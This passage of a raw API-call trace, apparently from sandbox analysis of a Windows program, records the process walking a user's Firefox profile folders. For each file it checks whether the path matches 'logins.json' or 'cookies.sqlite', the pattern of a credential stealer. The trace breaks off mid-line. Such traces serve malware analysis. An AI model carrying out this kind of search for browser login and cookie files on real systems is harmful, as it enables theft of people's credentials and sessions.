lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" [0161.171] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned 63 [0161.171] lstrlenW (lpString="Crash Reports") returned 13 [0161.171] GetProcessHeap () returned 0x8e0000 [0161.171] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9252c0 [0161.171] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\" [0161.172] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\", lpString2="Crash Reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Crash Reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Crash Reports" [0161.172] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.172] GetProcessHeap () returned 0x8e0000 [0161.172] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0161.172] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Crash Reports", lpSrch="logins.json") returned 0x0 [0161.172] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\Crash Reports", lpSrch="cookies.sqlite") returned 0x0 [0161.172] VirtualQuery (in: lpAddress=0x9252c0, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.172] GetProcessHeap () returned 0x8e0000 [0161.172] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c0 | out: hHeap=0x8e0000) returned 1 [0161.172] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0161.172] lstrcmpiW (lpString1="Profiles", lpString2=".") returned 1 [0161.172] lstrcmpiW (lpString1="Profiles", lpString2="..") returned 1 [0161.172] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.172] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.196] lstrlenW (lpString="") returned 0 [0161.196] GetProcessHeap () returned 0x8e0000 [0161.196] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x7e) returned 0x926478 [0161.196] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.196] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.197] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0161.197] lstrlenW (lpString="Profiles") returned 8 [0161.197] GetProcessHeap () returned 0x8e0000 [0161.197] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8e) returned 0x9252c0 [0161.197] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0161.197] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0161.197] VirtualQuery (in: lpAddress=0x926478, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.197] GetProcessHeap () returned 0x8e0000 [0161.197] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926478 | out: hHeap=0x8e0000) returned 1 [0161.197] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 70 [0161.197] lstrlenW (lpString="") returned 0 [0161.197] GetProcessHeap () returned 0x8e0000 [0161.197] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8e) returned 0x926478 [0161.197] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0161.197] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0161.197] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 70 [0161.197] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 70 [0161.197] lstrlenW (lpString="\\*.*") returned 4 [0161.197] GetProcessHeap () returned 0x8e0000 [0161.197] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x96) returned 0x925358 [0161.197] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0161.197] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*" [0161.197] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0161.197] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.197] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName="..", cAlternateFileName="")) returned 1 [0161.197] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.197] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.197] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName="silmbjec.default", cAlternateFileName="SILMBJ~1.DEF")) returned 1 [0161.197] lstrcmpiW (lpString1="silmbjec.default", lpString2=".") returned 1 [0161.197] lstrcmpiW (lpString1="silmbjec.default", lpString2="..") returned 1 [0161.198] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 70 [0161.198] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 70 [0161.198] lstrlenW (lpString="\\") returned 1 [0161.198] GetProcessHeap () returned 0x8e0000 [0161.198] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x90) returned 0x9253f8 [0161.198] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles" [0161.198] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0161.198] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 71 [0161.198] lstrlenW (lpString="silmbjec.default") returned 16 [0161.198] GetProcessHeap () returned 0x8e0000 [0161.198] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x925490 [0161.198] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0161.198] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.198] VirtualQuery (in: lpAddress=0x9253f8, lpBuffer=0x2df4e0, dwLength=0x1c | out: lpBuffer=0x2df4e0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.198] GetProcessHeap () returned 0x8e0000 [0161.198] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9253f8 | out: hHeap=0x8e0000) returned 1 [0161.198] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.198] lstrlenW (lpString="") returned 0 [0161.198] GetProcessHeap () returned 0x8e0000 [0161.198] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x925548 [0161.198] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.198] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.198] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.198] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.198] lstrlenW (lpString="\\*.*") returned 4 [0161.198] GetProcessHeap () returned 0x8e0000 [0161.198] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb8) returned 0x925600 [0161.198] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.198] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*.*" [0161.198] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*.*", lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0161.198] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.198] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x85442390, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x85442390, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.199] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.199] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.199] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb76a6d10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb76a6d10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb76a6d10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="addons.json", cAlternateFileName="ADDONS~1.JSO")) returned 1 [0161.199] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.199] lstrlenW (lpString="\\") returned 1 [0161.199] GetProcessHeap () returned 0x8e0000 [0161.199] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.199] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.199] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.199] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.199] lstrlenW (lpString="addons.json") returned 11 [0161.199] GetProcessHeap () returned 0x8e0000 [0161.199] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x925780 [0161.199] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.199] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="addons.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" [0161.199] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.199] GetProcessHeap () returned 0x8e0000 [0161.199] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.199] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json", lpSrch="logins.json") returned 0x0 [0161.199] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json", lpSrch="cookies.sqlite") returned 0x0 [0161.199] VirtualQuery (in: lpAddress=0x925780, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.199] GetProcessHeap () returned 0x8e0000 [0161.199] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925780 | out: hHeap=0x8e0000) returned 1 [0161.199] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x8503de70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x8503de70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarkbackups", cAlternateFileName="BOOKMA~1")) returned 1 [0161.199] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0161.199] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0161.199] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.199] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.199] lstrlenW (lpString="\\") returned 1 [0161.199] GetProcessHeap () returned 0x8e0000 [0161.199] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x9256c0 [0161.199] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.199] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.199] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.199] lstrlenW (lpString="bookmarkbackups") returned 15 [0161.200] GetProcessHeap () returned 0x8e0000 [0161.200] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fce90 [0161.200] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.200] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.200] VirtualQuery (in: lpAddress=0x9256c0, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.200] GetProcessHeap () returned 0x8e0000 [0161.200] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256c0 | out: hHeap=0x8e0000) returned 1 [0161.200] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0161.200] lstrlenW (lpString="") returned 0 [0161.200] GetProcessHeap () returned 0x8e0000 [0161.200] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fcf68 [0161.200] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.200] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups" [0161.200] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups") returned 103 [0161.200] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 